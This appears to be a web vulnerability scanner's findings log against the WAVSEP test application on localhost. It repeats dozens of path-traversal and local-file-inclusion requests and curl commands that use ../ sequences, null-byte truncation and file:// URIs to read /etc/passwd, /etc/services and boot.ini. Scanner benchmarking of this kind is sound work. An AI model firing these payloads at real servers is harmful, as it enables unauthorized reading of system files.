Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
